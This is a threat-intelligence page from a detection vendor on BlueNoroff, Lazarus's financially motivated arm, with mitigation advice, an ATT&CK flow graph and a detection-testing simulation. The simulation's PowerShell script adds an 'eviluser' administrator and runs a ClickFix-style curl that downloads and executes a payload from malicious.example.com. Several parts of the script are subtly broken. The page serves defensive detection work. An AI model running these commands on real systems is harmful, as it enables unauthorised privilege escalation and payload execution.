SOC Prime Bias: Critical

21 Jan 2026 18:58
newspaper icon picussecurity.com

BlueNoroff Group: The Financial Cybercrime Arm of Lazarus

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
BlueNoroff Group: The Financial Cybercrime Arm of Lazarus
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

BlueNoroff is a financially driven sub-group within the Lazarus ecosystem that focuses on high-value theft operations against banks, cryptocurrency firms, and broader Web3 targets. The group’s playbook spans SWIFT-enabled fraud, watering-hole compromises, supply-chain poisoning of Go packages, and macOS intrusion paths built around fake “job interview” lures. To achieve execution and persistence, BlueNoroff blends a modular Rust/Go malware stack with AppleScript, VBScript, and social-engineering workflows designed to bypass user caution and blend into legitimate development and admin activity.

Investigation

The report tracks BlueNoroff’s trajectory from the 2016 Bangladesh Bank heist through more recent 2025-era supply-chain activity, highlighting how the actor’s tooling and targeting have expanded alongside the crypto/Web3 ecosystem. Researchers outline infrastructure patterns and catalog malware components including GhostCall, GhostHire, RustBucket, and GillyInjector. The investigation also maps observed behaviors to MITRE ATT&CK across stages such as reconnaissance and initial access, then execution, persistence, and credential theft—underscoring a consistent emphasis on stealthy footholds, staged payload delivery, and theft-ready access paths.

Mitigation

Reduce exposure by tightening supply-chain hygiene: validate packages pulled from public registries, enforce pinning and provenance controls, and continuously review dependency updates for unexpected maintainer or code changes. On macOS, harden LaunchAgent/LaunchDaemon governance and monitor for suspicious persistence entries and unsigned tooling. Block look-alike domains used for lure delivery, enforce MFA for privileged identities and externally exposed services, and operationalize detections for known malicious scripts, loaders, and packing techniques associated with the actor. Maintain frequent threat-intelligence updates and reinforce user training focused on spear-phishing and “recruiter/job interview” social engineering patterns.

Response

If BlueNoroff indicators are discovered, isolate affected hosts and preserve key evidence, including full command lines, script content, and dropped binaries or package artifacts. Block identified malicious domains and C2 IPs, then execute incident response playbooks aligned to credential theft and supply-chain compromise scenarios. Deploy or tune detections for AppleScript and VBScript execution chains, and for suspicious PowerShell patterns called out in the reporting, then broaden hunting to identify additional endpoints exposed to the same lure, dependency, or infrastructure overlap.

"graph TB %% Class Definitions classDef technique fill:#99ccff classDef action fill:#ffdd99 classDef operator fill:#ff9900 %% Technique Nodes gather_identity["<b>Technique</b> – <b>T1589 Gather Victim Identity Information</b><br/>Collects personal, professional, and online information about the target."] class gather_identity technique search_social["<b>Technique</b> – <b>T1593.001 Search Social Media</b><br/>Queries victimu2011owned social media accounts to locate useful data."] class search_social technique phish_info["<b>Technique</b> – <b>T1598.001 Phishing for Information</b><br/>Crafts messages to trick victims into revealing credentials or other data."] class phish_info technique spearphish_service["<b>Technique</b> – <b>T1566.003 Spearphishing via Service</b><br/>Uses a legitimate online service to deliver malicious content to the victim."] class spearphish_service technique launch_agent["<b>Technique</b> – <b>T1543.001 Launch Agent</b><br/>Installs a macOS launch agent to achieve persistence."] class launch_agent technique launch_daemon["<b>Technique</b> – <b>T1543.004 Launch Daemon</b><br/>Installs a macOS launch daemon to achieve persistence."] class launch_daemon technique tcc_manip["<b>Technique</b> – <b>T1548.006 TCC Manipulation</b><br/>Modifies Transparency, Consent, and Control settings to obtain higher privileges."] class tcc_manip technique software_packing["<b>Technique</b> – <b>T1027.002 Software Packing</b><br/>Compresses or encrypts the payload to evade analysis."] class software_packing technique masquerading["<b>Technique</b> – <b>T1036.005 Masquerading</b><br/>Renames files or uses familiar icons to appear legitimate."] class masquerading technique gui_input["<b>Technique</b> – <b>T1056.002 GUI Input Capture</b><br/>Records keystrokes or mouse input from graphical interfaces to steal credentials."] class gui_input technique system_info["<b>Technique</b> – <b>T1082 System Information Discovery</b><br/>Collects OS version, hardware details, and installed software."] class system_info technique data_local["<b>Technique</b> – <b>T1005 Data from Local System</b><br/>Copies files of interest from the infected host."] class data_local technique local_staging["<b>Technique</b> – <b>T1074.001 Local Data Staging</b><br/>Places collected data in a directory for later exfiltration."] class local_staging technique web_protocols["<b>Technique</b> – <b>T1071.001 Web Protocols</b><br/>Uses HTTP/HTTPS for command and control traffic."] class web_protocols technique dead_drop["<b>Technique</b> – <b>T1102.001 Dead Drop Resolver</b><br/>Retrieves instructions from a publicly hosted location."] class dead_drop technique bidirectional["<b>Technique</b> – <b>T1102.002 Bidirectional C2</b><br/>Allows twou2011way communication between attacker and malware."] class bidirectional technique oneway["<b>Technique</b> – <b>T1102.003 Oneu2011Way C2</b><br/>Only receives commands from the attacker without sending data back."] class oneway technique %% Action Nodes user_click["<b>Action</b> – User clicks malicious link and downloads payload"] class user_click action %% Operator Node (optional AND for persistence options) op_persistence(("AND")) class op_persistence operator %% Connections gather_identity –>|leads to| search_social search_social –>|leads to| phish_info phish_info –>|leads to| spearphish_service spearphish_service –>|triggers| user_click user_click –>|establishes| op_persistence op_persistence –>|uses| launch_agent op_persistence –>|uses| launch_daemon launch_agent –>|enables| tcc_manip launch_daemon –>|enables| tcc_manip tcc_manip –>|enables| software_packing tcc_manip –>|enables| masquerading software_packing –>|facilitates| gui_input masquerading –>|facilitates| gui_input gui_input –>|provides| system_info system_info –>|supports| data_local data_local –>|prepares| local_staging local_staging –>|exfiltrates via| web_protocols web_protocols –>|supports| dead_drop dead_drop –>|supports| bidirectional bidirectional –>|supports| oneway "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:

    1. AppleScript Execution (T1546.016) – The adversary drops a malicious payload.scpt onto the endpoint (e.g., via a phishing attachment). Using a pre‑installed osascript.exe (bundled with a third‑party tool), they launch the script to execute a PowerShell payload that adds a new local administrator account.
    2. ClickFix Clipboard Delivery (T1204.004) – The attacker copies a crafted command to the clipboard that invokes curl with a Zoom‑style user‑agent to download a second‑stage payload, then immediately executes it via cmd.exe. The command also includes an inline powershell.exe -c call to run the payload in memory.

  • Regression Test Script: The script below reproduces both behaviors in a deterministic way.

    #----- BEGIN REGRESSION TEST SCRIPT -----
# Ensure we are running with administrative privileges
if (-not ([Security.Principal.WindowsPrincipal] `
    [Security.Principal.WindowsBuiltInRole] "Administrator")) {
    Write-Error "Run this script as Administrator."
    exit 1
}

# 1. AppleScript execution via osascript.exe
$appleScriptPath = "$env:TEMPmalicious.scpt"
Set-Content -Path $appleScriptPath -Value @"
tell application "System Events"
    do shell script "powershell -c `"Add-LocalGroupMember -Group 'Administrators' -Member 'eviluser'`""
end tell
"@
# Execute the AppleScript
Start-Process -FilePath "osascript.exe" -ArgumentList "`"$appleScriptPath`"" -NoNewWindow -Wait

# 2. ClickFix style clipboard delivery
$clickFixCmd = 'curl -A "ZoomSDK" http://malicious.example.com/payload.exe -o $env:TEMPpayload.exe && powershell.exe -c "Start-Process $env:TEMPpayload.exe"'
# Run via cmd.exe to match rule condition
Start-Process -FilePath "cmd.exe" -ArgumentList "/c `$clickFixCmd" -NoNewWindow -Wait

# Cleanup: remove artifacts
Remove-Item -Path $appleScriptPath -Force
Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue
# End of script
#----- END REGRESSION TEST SCRIPT -----

  • Cleanup Commands: Remove any lingering processes, files, and the test user account.

    # Stop any lingering processes (defensive – normally not needed)
Get-Process -Name "osascript","cmd","powershell","payload" -ErrorAction SilentlyContinue | Stop-Process -Force

# Delete temporary files
Remove-Item -Path "$env:TEMPmalicious.scpt" -Force -ErrorAction SilentlyContinue
Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue

# Remove the test admin account if it was created
if (Get-LocalUser -Name "eviluser" -ErrorAction SilentlyContinue) {
    Remove-LocalUser -Name "eviluser"
}

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free